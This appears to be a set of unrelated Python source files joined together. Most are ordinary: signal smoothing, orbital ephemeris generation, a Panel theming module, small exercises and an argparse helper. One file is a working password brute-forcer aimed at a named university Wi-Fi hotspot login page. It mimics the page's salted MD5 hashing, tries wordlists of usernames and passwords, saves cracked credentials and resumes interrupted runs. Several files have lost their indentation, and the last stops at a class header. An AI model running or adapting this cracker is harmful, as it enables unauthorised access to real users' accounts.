        dt = np.abs(time[1] - time[0])
    else:
        # No time axis available: zero-fill the gaps before filtering.
        _h[i_nan] = 0
    return signal.savgol_filter(_h, window, order, deriv, delta=dt, mode=mode)
def sgolay2d(z, window_size, order, derivative=None):
    """Two dimensional data smoothing and least-square gradient estimate.
    Code from:
    http://scipy-cookbook.readthedocs.io/items/SavitzkyGolay.html
    Reference:
    A. Savitzky, M. J. E. Golay, Smoothing and Differentiation of
    Data by Simplified Least Squares Procedures. Analytical
    Chemistry, 1964, 36 (8), pp 1627-1639.

    ``derivative`` may be None (smoothing), 'col', 'row', or 'both'.
    """
    # number of terms in the polynomial expression
    # TODO: Double check this (changed for Py3)
    n_terms = (order + 1) * (order + 2) // 2
    if window_size % 2 == 0:
        raise ValueError("window_size must be odd")
    if window_size ** 2 < n_terms:
        raise ValueError("order is too high for the window size")
    half_size = window_size // 2
    # exponents of the polynomial.
    # p(x,y) = a0 + a1*x + a2*y + a3*x^2 + a4*y^2 + a5*x*y + ...
    # this line gives a list of two item tuple. Each tuple contains
    # the exponents of the k-th term. First element of tuple is for x
    # second element for y.
    # Ex. exps = [(0,0), (1,0), (0,1), (2,0), (1,1), (0,2), ...]
    exps = [(k - n, n) for k in range(order + 1) for n in range(k + 1)]
    # coordinates of points
    ind = np.arange(-half_size, half_size + 1, dtype=np.float64)
    dx = np.repeat(ind, window_size)
    dy = np.tile(ind, [window_size, 1]).reshape(window_size ** 2,)
    # build matrix of system of equation
    A = np.empty((window_size ** 2, len(exps)))
    for i, exp in enumerate(exps):
        A[:, i] = (dx ** exp[0]) * (dy ** exp[1])
    # pad input array with appropriate values at the four borders
    new_shape = z.shape[0] + 2 * half_size, z.shape[1] + 2 * half_size
    Z = np.zeros((new_shape))
    # top band
    band = z[0, :]
    Z[:half_size, half_size:-half_size] = band - np.abs(
        np.flipud(z[1 : half_size + 1, :]) - band
    )
    # bottom band
    band = z[-1, :]
    Z[-half_size:, half_size:-half_size] = band + np.abs(
        np.flipud(z[-half_size - 1 : -1, :]) - band
    )
    # left band
    band = np.tile(z[:, 0].reshape(-1, 1), [1, half_size])
    Z[half_size:-half_size, :half_size] = band - np.abs(
        np.fliplr(z[:, 1 : half_size + 1]) - band
    )
    # right band
    band = np.tile(z[:, -1].reshape(-1, 1), [1, half_size])
    Z[half_size:-half_size, -half_size:] = band + np.abs(
        np.fliplr(z[:, -half_size - 1 : -1]) - band
    )
    # central band
    Z[half_size:-half_size, half_size:-half_size] = z
    # top left corner
    band = z[0, 0]
    Z[:half_size, :half_size] = band - np.abs(
        np.flipud(np.fliplr(z[1 : half_size + 1, 1 : half_size + 1])) - band
    )
    # bottom right corner
    band = z[-1, -1]
    Z[-half_size:, -half_size:] = band + np.abs(
        np.flipud(np.fliplr(z[-half_size - 1 : -1, -half_size - 1 : -1]))
        - band
    )
    # top right corner
    band = Z[half_size, -half_size:]
    Z[:half_size, -half_size:] = band - np.abs(
        np.flipud(Z[half_size + 1 : 2 * half_size + 1, -half_size:]) - band
    )
    # bottom left corner
    band = Z[-half_size:, half_size].reshape(-1, 1)
    Z[-half_size:, :half_size] = band - np.abs(
        np.fliplr(Z[-half_size:, half_size + 1 : 2 * half_size + 1]) - band
    )
    # solve system and convolve
    # (rows 0/1/2 of the pseudo-inverse give the smoothing, d/d-col and
    # d/d-row kernels respectively)
    if derivative is None:
        m = np.linalg.pinv(A)[0].reshape((window_size, -1))
        return signal.fftconvolve(Z, m, mode="valid")
    elif derivative == "col":
        c = np.linalg.pinv(A)[1].reshape((window_size, -1))
        return signal.fftconvolve(Z, -c, mode="valid")
    elif derivative == "row":
        r = np.linalg.pinv(A)[2].reshape((window_size, -1))
        return signal.fftconvolve(Z, -r, mode="valid")
    elif derivative == "both":
        c = np.linalg.pinv(A)[1].reshape((window_size, -1))
        r = np.linalg.pinv(A)[2].reshape((window_size, -1))
        return (
            signal.fftconvolve(Z, -r, mode="valid"),
            signal.fftconvolve(Z, -c, mode="valid"),
        )
# Some edge test cases (for the 3-km grid)
# (row, col) indices into the 3-km grid used for manual spot checks of
# tricky locations (floating ice, single-mission coverage, steps/holes).
test_ij_3km = [
    (845, 365),  # 0 PIG Floating 1
    (831, 364),  # 1 PIG Floating 2
    (1022, 840),  # 2 CS-2 only 1
    (970, 880),  # 3 CS-2 only 2
    (100, 1170),  # 4 fig1 large peaks at mission overlaps
    (100, 766),  # 5 fig2 peak at mission overlap
    (7, 893),  # 6 step change at beguining
    (8, 892),  # 7 with hole
    (9, 889),  # 8 with large hole
    (11, 893),  # 9 step in divergence
]
# Small interactive demo: greet the user, take a car request, check the
# party size against table capacity, and test a number for divisibility
# by 10.
admin_message = "Let me know how you are doing!"
admin_message += "\nHow are you doing? "
hayd = input(admin_message)
print(f"You are doing {hayd}")
car_message = input("Enter the car you're looking for: ")
print(f"Let's see if we can find a {car_message} for you.")
seatings = int(input("How many people are you seating? "))
if seatings > 8:
    print("Sorry! You'll have to wait for a table.")
else:
    print("Come on in m8. We got you a table.")
numeral = int(input("Enter a number: "))
if numeral % 10 == 0:
    print("It is a multiple of 10")
else:
    print("Nope.")
|
import argparse
import hashlib
import os
from bs4 import BeautifulSoup as bs
import requests
from time import ctime, time
address = "http://hotspot.abu.edu.ng/login"
def main():
try:
parser = argparse.ArgumentParser()
parser.add_argument("-u", "--usernames", help="specify a file containing list of usernames", required=True)
parser.add_argument("-p", "--passwords", help="specify a file containing list of passwords", required=True)
args = parser.parse_args()
opener(args.usernames, args.passwords)
except KeyboardInterrupt as e:
print("Cracking interrupted....Ending...")
exit()
#opener: u gussed it as the name implies open a list of usernames and passwords
#read them and save them to memory
def opener(user_list, pass_list):
try:
with open(os.getcwd()+"/"+user_list, "r") as f:
usernames = f.readlines() # contains the list of usernames
with open(os.getcwd()+"/"+pass_list, "r") as f:
passwords = f.readlines() #contains the list of passwords
first_unresumed = passwords[0]
print("Loaded "+str(len(usernames))+" usernames with "+str(len(passwords))+" passwords...")
passwords = try_resume(passwords)
first_resumed = passwords[0]
if first_resumed != first_unresumed:
print("Resume point found...resuming from "+first_resumed+"\npasswords remaining: "+str(len(passwords)))
cracker(usernames, passwords)
except IOError as e:
print(e)
exit()
#this function try all the combination of usernames and password in the
#supplied dictionaries(of usernames and passwords)
def cracker(usernames, passwords):
try:
with open(os.getcwd()+"/cracked_cred.dmd", "a") as f:
start_time = time()
print("Started at %s \nCracking..."%ctime(start_time))
for psswds in passwords:
psswd = psswds.strip("\n")
for users in usernames:
user = users.strip("\n")
psswd = encrypt(psswd) #placed here in case of more than 1 username
print("trying user: "+user+" with hash "+psswd)
cracked = checker(user, psswd)
if cracked == True:
f.write(user+"::"+psswds+"\n")
print("found password for "+user+" ==> "+psswds)
usernames.remove(users)
elif cracked == "somethin":
print("somthing abnormal happened...with user: "+user+" with password: "+psswds)
raise KeyboardInterrupt
print("Exhausted the list of passwords \n total time taken: %s"%time()-start_time)
except KeyboardInterrupt:
with open(os.getcwd()+"/resume.dmd", "w") as f:
f.write(psswds)
exit()
except Exception as e:
print(e)
exit()
#this function checks if the username and password matches by passing
#them to the site
def checker(user, psswd):
try:
payloads = {"username":user, "password":psswd, "dst":"", "popup":"true"}
with requests.Session() as s:
page = s.post(address, data=payloads)
soup = bs(page.content, "html.parser")
page = soup.prettify("utf-8")
if "You are logged in" in page:
with requests.Session() as s:
s.get("http://hotspot.abu.edu.ng/logout")
return True
elif "ANNOUNCEMENT" not in page:
return "somethin"
except Exception as e:
print(e)
exit()
#this function replicates the security implementation used in the site
#which is happening on client side
#i.e appending a salt to begining and end of password then encrypting
#with md5
def encrypt(psswd):
try:
with requests.Session() as s:
page = s.get(address) #get the login page
soup = bs(page.content, "html.parser") #parsing the page
clean_page = soup.prettify("utf-8")
clean_page_soup = bs(clean_page, "html.parser")
script = str(clean_page_soup.find("script").find_next().string.strip())
first = chr(int(script[144:147], 8))
second = script[185:248].split("\\")
chars = [] #this will contains a list of character that will be converted to 4rm ints in the next lines
for i in second: #for each item in the list second
chars.append(chr(int(i, 8))) #append a chr value which is converted from int
second = "".join(chars)
return hashlib.md5(first+psswd+second).hexdigest()
except Exception as e:
print(e)
exit()
def try_resume(passwords):
if not os.path.exists(os.getcwd()+"/resume.dmd"):
file_open = open(os.getcwd()+"/resume.dmd", "w")
file_open.close()
return passwords
with open("resume.dmd", "r") as f:
last_pass = f.readline()
if last_pass.strip("\n") == "":
return passwords
else:
pass_index = passwords.index(last_pass)
passwords = passwords[pass_index:]
return passwords
if __name__=="__main__":
main()
|
import os
def _stop_and_close(qtbot, v):
if os.environ.get('PHY_TEST_STOP', None): # pragma: no cover
qtbot.stop()
v.close()
|
import orekit
# Start the embedded JVM before any org.orekit classes are imported/used.
orekit.initVM()
# Modified from https://gitlab.orekit.org/orekit-labs/python-wrapper/blob/master/python_files/pyhelpers.py
from java.io import File
from org.orekit.data import DataProvidersManager, DirectoryCrawler
from orekit import JArray
# Register the local orekit-data folder (Earth orientation, leap seconds,
# ephemerides) with Orekit's data-provider manager.
orekit_data_dir = 'orekit-data'
DM = DataProvidersManager.getInstance()
datafile = File(orekit_data_dir)
if not datafile.exists():
    print('Directory :', datafile.absolutePath, ' not found')
crawler = DirectoryCrawler(datafile)
DM.clearProviders()
DM.addProvider(crawler)
from org.orekit.frames import FramesFactory
# Reference frames used below: ICRF for planets, EME2000 for the Moon.
icrf = FramesFactory.getICRF()
eme2000 = FramesFactory.getEME2000()
from org.orekit.time import TimeScalesFactory
tai = TimeScalesFactory.getTAI()
utc = TimeScalesFactory.getUTC()
from org.orekit.time import AbsoluteDate
# Modified Julian Date epoch (1858-11-17 00:00:00) in the TAI time scale.
mjd_epoch_tai = AbsoluteDate(1858, 11, 17, 0, 0, 0.0, tai)
# Bodies for which ephemeris/attitude files are generated (the Moon is
# handled specially below: Earth-centred, EME2000 frame).
planets = [
    'Mercury',
    'Venus',
    'Earth',
    'Moon',
    'Mars',
    'Jupiter',
    'Saturn',
    'Uranus',
    'Neptune'
]
originator = 'GorgiAstro'
from odmadmpy.core import Oem, Aem
# CIC-standard writers for orbit (OEM) and attitude (AEM) ephemeris files.
oem = Oem(originator, standard='CIC')
aem = Aem(originator, standard='CIC')
comment = 'Generated from Orekit using DE405 ephemerides'
cic_output_folder = 'CIC-data'
# Template OEM metadata for a planet (Sun-centred, ICRF).
meta_mandat_oem_cic_sample = {
    'OBJECT_NAME': 'MARS',
    'OBJECT_ID': 'MARS',
    'CENTER_NAME': 'SUN',
    'REF_FRAME': 'ICRF',
    'TIME_SYSTEM': 'TAI'
}
# OEM metadata for the Moon (Earth-centred, EME2000).
meta_mandat_oem_cic_moon = {
    'OBJECT_NAME': 'MOON',
    'OBJECT_ID': 'MOON',
    'CENTER_NAME': 'EARTH',
    'REF_FRAME': 'EME2000',
    'TIME_SYSTEM': 'TAI'
}
# Template AEM metadata for a planet (ICRF -> body-fixed quaternions).
meta_mandat_aem_cic_sample = {
    'OBJECT_NAME': 'MARS',
    'OBJECT_ID': 'MARS',
    'REF_FRAME_A': 'ICRF',
    'REF_FRAME_B': 'BODY',
    'ATTITUDE_DIR': 'A2B',
    'TIME_SYSTEM': 'TAI',
    'ATTITUDE_TYPE': 'QUATERNION'
}
meta_opt_aem_cic = {
    'QUATERNION_TYPE': 'FIRST'
}
# AEM metadata for the Moon (EME2000 -> body-fixed quaternions).
meta_mandat_aem_cic_moon = {
    'OBJECT_NAME': 'MOON',
    'OBJECT_ID': 'MOON',
    'REF_FRAME_A': 'EME2000',
    'REF_FRAME_B': 'BODY',
    'ATTITUDE_DIR': 'A2B',
    'TIME_SYSTEM': 'TAI',
    'ATTITUDE_TYPE': 'QUATERNION'
}
from org.orekit.bodies import CelestialBodyFactory
from org.orekit.utils import PVCoordinatesProvider
from orekit.pyhelpers import datetime_to_absolutedate, absolutedate_to_datetime
import pandas as pd
import numpy as np
import os
from tqdm import tqdm
date_init = AbsoluteDate(1957, 1, 1, tai)
date_end = AbsoluteDate(2057, 1, 1, tai)
dt = 86400.0 / 5
for planet_name in planets:
print(f'Started generating ephemerides for {planet_name}')
if planet_name == 'Moon':
meta_mandat_oem_cic = meta_mandat_oem_cic_moon
meta_mandat_aem_cic = meta_mandat_aem_cic_moon
ref_frame = eme2000
else:
meta_mandat_oem_cic = meta_mandat_oem_cic_sample
meta_mandat_aem_cic = meta_mandat_aem_cic_sample
meta_mandat_oem_cic['OBJECT_NAME'] = planet_name.upper()
meta_mandat_oem_cic['OBJECT_ID'] = planet_name.upper()
meta_mandat_aem_cic['OBJECT_NAME'] = planet_name.upper()
meta_mandat_aem_cic['OBJECT_ID'] = planet_name.upper()
ref_frame = icrf
df = pd.DataFrame(columns=['MJD', 'x', 'y', 'z', 'vx', 'vy', 'vz', 'qs', 'qx', 'qy', 'qz'])
cbody = CelestialBodyFactory.getBody(planet_name.upper())
cbody_pv_provider = PVCoordinatesProvider.cast_(cbody)
cbody_frame = cbody.getBodyOrientedFrame()
date_current = date_init
years_from_start = 0.0
years_from_start_previous = 0.0
with tqdm(total=100) as pbar:
while date_current.compareTo(date_end) < 0:
pv = cbody_pv_provider.getPVCoordinates(date_current, ref_frame)
ref_frame_to_body = ref_frame.getTransformTo(cbody_frame, date_current)
rot = ref_frame_to_body.getRotation()
quat = [rot.getQ0(), rot.getQ1(), rot.getQ2(), rot.getQ3()]
mjd = date_current.offsetFrom(mjd_epoch_tai, tai) / 86400
df.loc[absolutedate_to_datetime(date_current)] = np.concatenate((
[mjd],
np.array(pv.getPosition().toArray()),
np.array(pv.getVelocity().toArray()),
quat))
date_current = date_current.shiftedBy(dt)
date_comp = date_current.getComponents(tai)
is_new_year = (date_comp.getDate().getDayOfYear() == 1) and (date_comp.getTime().getSecondsInLocalDay() < dt / 2)
if is_new_year:
pbar.update(1)
df['datetime'] = df.index
oem_segments = []
oem_segments += oem.format_segment(df, meta_mandat_oem_cic)
oem.write_file(oem_segments, os.path.join(cic_output_folder, f'{planet_name}_OEM_EME2000.txt'), comments=[comment])
aem_segments = []
aem_segments += aem.format_segment(df, meta_mandat_aem_cic, meta_opt_aem_cic)
aem.write_file(aem_segments, os.path.join(cic_output_folder, f'{planet_name}_AEM_EME2000.txt'), comments=[comment])
print(f'Finished generating ephemerides for {planet_name}')
|
Autocube Numbers
Autocube numbers are numbers having "n" digits such that the last n digits of the cube of the number will be the number itself. Write an algorithm and the subsequent Python code to check if the given number is autocube, including a function to find the cube of a given number. For example, 25 is a 2-digit autocube number with a cube of 15625, and 376, with its cube 53157376, is a 3-digit autocube number.
Input Format: First line contains the number to be checked
Output Format: Print Autocube or Not autocube
def cube(n):
    """Return the cube of n."""
    return n * n * n


def is_autocube(n):
    """Return True if n is an autocube number.

    A number with d digits is an autocube when the last d digits of its
    cube equal the number itself (e.g. 25 -> 15625, 376 -> 53157376).
    """
    digits = len(str(n))
    # The last `digits` digits of the cube are simply cube(n) mod 10**digits;
    # this replaces the original digit-by-digit reconstruction loop (which
    # also carried an unused counter variable `m`).
    return cube(n) % 10 ** digits == n


if __name__ == '__main__':
    # Input: the number to check. Output: 'Autocube' or 'Not autocube'.
    n = int(input())
    if is_autocube(n):
        print('Autocube')
    else:
        print('Not autocube')
|
from __future__ import annotations
import functools
import os
import pathlib
from typing import (
TYPE_CHECKING, Any, ClassVar, Dict, List, Literal, Tuple, Type,
)
import param
from bokeh.models import ImportedStyleSheet
from bokeh.themes import Theme as _BkTheme, _dark_minimal, built_in_themes
from ..config import config
from ..io.resources import (
ResourceComponent, component_resource_path, get_dist_path,
resolve_custom_path,
)
from ..util import relative_to
if TYPE_CHECKING:
from bokeh.document import Document
from bokeh.model import Model
from ..io.resources import ResourceTypes
from ..viewable import Viewable
class Inherit:
    """
    Singleton object to declare stylesheet inheritance.

    Used as a marker inside a `stylesheets` modifier list: when it is
    encountered the inherited stylesheets are spliced in at that point
    (see `Design._resolve_stylesheets`).
    """
class Theme(param.Parameterized):
    """
    Theme objects declare the styles to switch between different color
    modes. Each `Design` may declare any number of color themes.

    The class-level `modifiers` mapping overrides parameter values of
    Panel components while the theme is active.
    """

    base_css = param.Filename(doc="""
        A stylesheet declaring the base variables that define the color
        scheme. By default this is inherited from a base class.""")

    bokeh_theme = param.ClassSelector(class_=(_BkTheme, str), default=None, doc="""
        A Bokeh Theme class that declares properties to apply to Bokeh
        models. This is necessary to ensure that plots and other canvas
        based components are styled appropriately.""")

    css = param.Filename(doc="""
        A stylesheet that overrides variables specifically for the
        Theme subclass. In most cases, this is not necessary.""")

    # Parameter overrides per Viewable type applied while this theme is active.
    modifiers: ClassVar[Dict[Viewable, Dict[str, Any]]] = {}
# Bokeh's stock dark_minimal theme with darker plot/border fills to match
# Panel's dark styling.
BOKEH_DARK = dict(_dark_minimal.json)
BOKEH_DARK['attrs']['Plot'].update({
    "background_fill_color": "#2b3035",
    "border_fill_color": "#212529",
})

# Directory containing the built-in theme stylesheets shipped with Panel.
THEME_CSS = pathlib.Path(__file__).parent / 'css'
class DefaultTheme(Theme):
    """
    Baseclass for default or light themes.
    """

    base_css = param.Filename(default=THEME_CSS / 'default.css')

    # Name under which this theme is registered on a Design.
    _name: ClassVar[str] = 'default'
class DarkTheme(Theme):
    """
    Baseclass for dark themes.
    """

    base_css = param.Filename(default=THEME_CSS / 'dark.css')

    # Dark themes also restyle Bokeh plots via the patched dark theme.
    bokeh_theme = param.ClassSelector(class_=(_BkTheme, str),
                                      default=_BkTheme(json=BOKEH_DARK))

    # Name under which this theme is registered on a Design.
    _name: ClassVar[str] = 'dark'
class Design(param.Parameterized, ResourceComponent):
    """
    A Design declares how Panel components are styled: it couples a
    color `Theme` with per-component `modifiers` (parameter overrides
    and stylesheets) and the resources required to render them.
    """

    theme = param.ClassSelector(class_=Theme, constant=True)

    # Defines parameter overrides to apply to each model
    modifiers: ClassVar[Dict[Viewable, Dict[str, Any]]] = {}

    # Defines the resources required to render this theme
    _resources: ClassVar[Dict[str, Dict[str, str]]] = {}

    # Declares valid themes for this Design
    _themes: ClassVar[Dict[str, Type[Theme]]] = {
        'default': DefaultTheme,
        'dark': DarkTheme
    }

    def __init__(self, theme=None, **params):
        # Accept a Theme subclass, a theme name, or None (-> 'default'),
        # and normalize it to an instance of the registered Theme type.
        if isinstance(theme, type) and issubclass(theme, Theme):
            theme = theme._name
        elif theme is None:
            theme = 'default'
        theme = self._themes[theme]()
        super().__init__(theme=theme, **params)

    def _reapply(
        self, viewable: Viewable, root: Model, old_models: List[Model] | None = None,
        isolated: bool=True, cache=None, document=None
    ) -> None:
        """
        Apply this design's modifiers to `viewable` and all components
        below it that belong to the Bokeh model tree rooted at `root`.
        Models listed in `old_models` are skipped (already styled).
        """
        ref = root.ref['id']
        for o in viewable.select():
            if o.design and not isolated:
                # Component has its own design; leave it alone when we are
                # restyling as part of a larger (non-isolated) render.
                continue
            elif not o.design and not isolated:
                # NOTE(review): checks the public `design` but assigns the
                # private `_design` — confirm this asymmetry is intended.
                o._design = self
            if old_models and ref in o._models:
                if o._models[ref][0] in old_models:
                    continue
            self._apply_modifiers(o, ref, self.theme, isolated, cache, document)

    def _apply_hooks(self, viewable: Viewable, root: Model, changed: Viewable, old_models=None) -> None:
        """Hook invoked on re-renders to restyle the changed component."""
        from ..io.state import state
        # Reuse (or create) the per-document stylesheet cache.
        if root.document in state._stylesheets:
            cache = state._stylesheets[root.document]
        else:
            state._stylesheets[root.document] = cache = {}
        # Freeze model updates so all changes are dispatched in one batch.
        with root.document.models.freeze():
            self._reapply(changed, root, old_models, isolated=False, cache=cache, document=root.document)

    def _wrapper(self, viewable):
        # Identity by default; presumably a hook for subclasses to wrap
        # the viewable in a styling container — confirm against subclasses.
        return viewable

    @classmethod
    def _resolve_stylesheets(cls, value, defining_cls, inherited):
        """
        Expand a `stylesheets` modifier list, splicing in `inherited`
        stylesheets wherever the `Inherit` marker appears and resolving
        all other entries relative to the class that declared them.
        """
        from ..io.resources import resolve_stylesheet
        stylesheets = []
        for stylesheet in value:
            if stylesheet is Inherit:
                stylesheets.extend(inherited)
                continue
            resolved = resolve_stylesheet(defining_cls, stylesheet, 'modifiers')
            stylesheets.append(resolved)
        return stylesheets

    @classmethod
    @functools.lru_cache
    def _resolve_modifiers(cls, vtype, theme):
        """
        Iterate over the class hierarchy in reverse order and accumulate
        all modifiers that apply to the objects class and its super classes.
        """
        # NOTE(review): lru_cache on a classmethod keys on (cls, vtype,
        # theme) and keeps theme instances alive for the cache lifetime.
        modifiers, child_modifiers = {}, {}
        for scls in vtype.__mro__[::-1]:
            # NOTE(review): this assignment is dead — it is overwritten on
            # the first iteration of the loop below.
            cls_modifiers = cls.modifiers.get(scls, {})
            modifiers.update(theme.modifiers.get(scls, {}))
            # Walk the Design hierarchy so subclasses override base Designs.
            for super_cls in cls.__mro__[::-1]:
                cls_modifiers = getattr(super_cls, 'modifiers', {}).get(scls, {})
                for prop, value in cls_modifiers.items():
                    if prop == 'children':
                        continue
                    elif prop == 'stylesheets':
                        modifiers[prop] = cls._resolve_stylesheets(value, super_cls, modifiers.get(prop, []))
                    else:
                        modifiers[prop] = value
                child_modifiers.update(cls_modifiers.get('children', {}))
        return modifiers, child_modifiers

    @classmethod
    def _get_modifiers(
        cls, viewable: Viewable, theme: Theme = None, isolated: bool = True
    ):
        """
        Resolve the modifiers for `viewable`, prepending the design- and
        theme-level stylesheets when the component is rendered in
        isolation (i.e. outside a template that provides them).
        """
        # Imported locally (shadowing the module-level imports) —
        # presumably to avoid a circular import; confirm.
        from ..io.resources import (
            CDN_DIST, component_resource_path, resolve_custom_path,
        )
        modifiers, child_modifiers = cls._resolve_modifiers(type(viewable), theme)
        modifiers = dict(modifiers)
        if 'stylesheets' in modifiers:
            if isolated:
                pre = list(cls._resources.get('css', {}).values())
                for p in ('base_css', 'css'):
                    css = getattr(theme, p)
                    if css is None:
                        continue
                    css = pathlib.Path(css)
                    if relative_to(css, THEME_CSS):
                        # Built-in theme CSS is served from the CDN bundle.
                        pre.append(f'{CDN_DIST}bundled/theme/{css.name}')
                    elif resolve_custom_path(theme, css):
                        # Custom theme CSS served via the component resource route.
                        pre.append(component_resource_path(theme, p, css))
                    else:
                        # Fall back to inlining the stylesheet contents.
                        pre.append(css.read_text(encoding='utf-8'))
            else:
                pre = []
            modifiers['stylesheets'] = pre + modifiers['stylesheets']
        return modifiers, child_modifiers

    @classmethod
    def _patch_modifiers(cls, doc, modifiers, cache):
        """
        Replace '.css' stylesheet paths with (cached) ImportedStyleSheet
        models so Bokeh loads them by URL instead of inlining them.
        """
        if 'stylesheets' in modifiers:
            stylesheets = []
            for sts in modifiers['stylesheets']:
                if sts.endswith('.css'):
                    if cache and sts in cache:
                        sts = cache[sts]
                    else:
                        sts = ImportedStyleSheet(url=sts)
                        if cache is not None:
                            cache[sts.url] = sts
                stylesheets.append(sts)
            modifiers['stylesheets'] = stylesheets

    @classmethod
    def _apply_modifiers(
        cls, viewable: Viewable, mref: str, theme: Theme, isolated: bool,
        cache={}, document=None
    ) -> None:
        """
        Resolve and apply modifiers for `viewable` (and child modifiers
        for its children) to the Bokeh model registered under `mref`.
        """
        # NOTE(review): `cache={}` is a mutable default shared across
        # calls; callers appear to always pass an explicit cache — confirm.
        if mref not in viewable._models:
            return
        model, _ = viewable._models[mref]
        modifiers, child_modifiers = cls._get_modifiers(viewable, theme, isolated)
        cls._patch_modifiers(model.document or document, modifiers, cache)
        if child_modifiers:
            for child in viewable:
                cls._apply_params(child, mref, child_modifiers, document)
        if modifiers:
            cls._apply_params(viewable, mref, modifiers, document)

    @classmethod
    def _apply_params(cls, viewable, mref, modifiers, document=None):
        """Push resolved modifier values onto the Bokeh model for `mref`."""
        # Apply params never sync the modifier values with the Viewable
        # This should not be a concern since most `Layoutable` properties,
        # e.g. stylesheets or sizing_mode, are not synced between the
        # Panel component and the model anyway however in certain edge cases
        # this may end up causing issues.
        from ..io.resources import CDN_DIST, patch_stylesheet
        model, _ = viewable._models[mref]
        # Only override parameters the user has not explicitly set
        # (i.e. those still at their default value).
        params = {
            k: v for k, v in modifiers.items() if k != 'children' and
            getattr(viewable, k) == viewable.param[k].default
        }
        if 'stylesheets' in modifiers:
            params['stylesheets'] = modifiers['stylesheets'] + viewable.stylesheets
        props = viewable._process_param_change(params)
        # Rewrite stylesheet URLs against the document's dist URL (or CDN).
        doc = model.document or document
        if doc and 'dist_url' in doc._template_variables:
            dist_url = doc._template_variables['dist_url']
        else:
            dist_url = CDN_DIST
        for stylesheet in props.get('stylesheets', []):
            if isinstance(stylesheet, ImportedStyleSheet):
                patch_stylesheet(stylesheet, dist_url)
        # Do not update stylesheets if they match
        if 'stylesheets' in props and len(model.stylesheets) == len(props['stylesheets']):
            all_match = True
            stylesheets = []
            for st1, st2 in zip(model.stylesheets, props['stylesheets']):
                if st1 == st2:
                    stylesheets.append(st1)
                    continue
                elif type(st1) is type(st2) and isinstance(st1, ImportedStyleSheet) and st1.url == st2.url:
                    # Equivalent imported stylesheet; keep the existing model
                    # to avoid an unnecessary frontend reload.
                    stylesheets.append(st1)
                    continue
                stylesheets.append(st2)
                all_match = False
            if all_match:
                del props['stylesheets']
            else:
                props['stylesheets'] = stylesheets
        model.update(**props)
        # Propagate synced properties to the model's children, if declared.
        if hasattr(viewable, '_synced_properties') and 'objects' in viewable._property_mapping:
            obj_key = viewable._property_mapping['objects']
            child_props = {
                p: v for p, v in params.items() if p in viewable._synced_properties
            }
            for child in getattr(model, obj_key):
                child.update(**child_props)

    #----------------------------------------------------------------
    # Public API
    #----------------------------------------------------------------

    def apply(self, viewable: Viewable, root: Model, isolated: bool=True):
        """
        Applies the Design to a Viewable and all it children.

        Arguments
        ---------
        viewable: Viewable
            The Viewable to apply the Design to.
        root: Model
            The root Bokeh model to apply the Design to.
        isolated: bool
            Whether the Design is applied to an individual component
            or embedded in a template that ensures the resources,
            such as CSS variable definitions and JS are already
            initialized.
        """
        doc = root.document
        if not doc:
            # No document yet: apply without stylesheet caching/batching.
            self._reapply(viewable, root, isolated=isolated)
            return
        from ..io.state import state
        if doc in state._stylesheets:
            cache = state._stylesheets[doc]
        else:
            state._stylesheets[doc] = cache = {}
        with doc.models.freeze():
            self._reapply(viewable, root, isolated=isolated, cache=cache)
        if self.theme and self.theme.bokeh_theme and doc:
            doc.theme = self.theme.bokeh_theme

    def apply_bokeh_theme_to_model(self, model: Model, theme_override=None):
        """
        Applies the Bokeh theme associated with this Design system
        to a model.

        Arguments
        ---------
        model: bokeh.model.Model
            The Model to apply the theme on.
        theme_override: str | None
            A different theme to apply.
        """
        theme = theme_override or self.theme.bokeh_theme
        if isinstance(theme, str):
            theme = built_in_themes.get(theme)
        if not theme:
            return
        # Apply to the model and everything it references.
        for sm in model.references():
            theme.apply_to_model(sm)

    def resolve_resources(
        self, cdn: bool | Literal['auto'] = 'auto', include_theme: bool = True
    ) -> ResourceTypes:
        """
        Resolves the resources required for this design component.

        Arguments
        ---------
        cdn: bool | Literal['auto']
            Whether to load resources from CDN or local server. If set
            to 'auto' value will be automatically determine based on
            global settings.
        include_theme: bool
            Whether to include theme resources.

        Returns
        -------
        Dictionary containing JS and CSS resources.
        """
        resource_types = super().resolve_resources(cdn)
        if not include_theme:
            return resource_types
        dist_path = get_dist_path(cdn=cdn)
        css_files = resource_types['css']
        theme = self.theme
        for attr in ('base_css', 'css'):
            css = getattr(theme, attr, None)
            if css is None:
                continue
            basename = os.path.basename(css)
            key = 'theme_base' if 'base' in attr else 'theme'
            if relative_to(css, THEME_CSS):
                # Built-in theme CSS is bundled with the distribution.
                css_files[key] = dist_path + f'bundled/theme/{basename}'
            elif resolve_custom_path(theme, css):
                owner = type(theme).param[attr].owner
                css_files[key] = component_resource_path(owner, attr, css)
        return resource_types

    def params(
        self, viewable: Viewable, doc: Document | None = None
    ) -> Tuple[Dict[str, Any], Dict[str, Any]]:
        """
        Provides parameter values to apply the provided Viewable.

        Arguments
        ---------
        viewable: Viewable
            The Viewable to return modifiers for.
        doc: Document | None
            Document the Viewable will be rendered into. Useful
            for caching any stylesheets that are created.

        Returns
        -------
        modifiers: Dict[str, Any]
            Dictionary of parameter values to apply to the Viewable.
        child_modifiers: Dict[str, Any]
            Dictionary of parameter values to apply to the children
            of the Viewable.
        """
        from ..io.state import state
        if doc is None:
            cache = {}
        elif doc in state._stylesheets:
            cache = state._stylesheets[doc]
        else:
            state._stylesheets[doc] = cache = {}
        modifiers, child_modifiers = self._get_modifiers(viewable, theme=self.theme)
        self._patch_modifiers(doc, modifiers, cache)
        return modifiers, child_modifiers
# Register Design as the accepted type of the global `config.design` setting.
config.param.design.class_ = Design

# Built-in themes addressable by name.
THEMES = {
    'default': DefaultTheme,
    'dark': DarkTheme
}
|
import argparse
class CLA:
    """Command line arguments class.

    Builds the program's argument parser and immediately parses
    ``sys.argv``; the result is exposed as ``self.args`` with the
    attributes ``input_file``, ``output_file`` and ``color_bool``.
    """

    def __init__(self):
        parser = argparse.ArgumentParser(description="Some description!")
        # -i / -o are mandatory file paths; -c is an optional boolean flag.
        parser.add_argument("-i", action="store", dest="input_file",
                            type=str, required=True)
        parser.add_argument("-o", action="store", dest="output_file",
                            type=str, required=True)
        parser.add_argument("-c", action="store_true", dest="color_bool")
        self.parser = parser
        self.args = parser.parse_args()
if __name__ == "__main__":
    """debug and testing"""
    # Parse the current command line and echo the parsed values.
    cla = CLA()
    print(cla.args)
    print(cla.args.input_file)
    print(cla.args.output_file)
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
# author: hao 2019/11/21-20:00
from datetime import datetime
from pymongo import MongoClient
from selenium import webdriver
from selenium.webdriver.common.action_chains import ActionChains
from selenium.webdriver.common.keys import Keys
class BossJob:
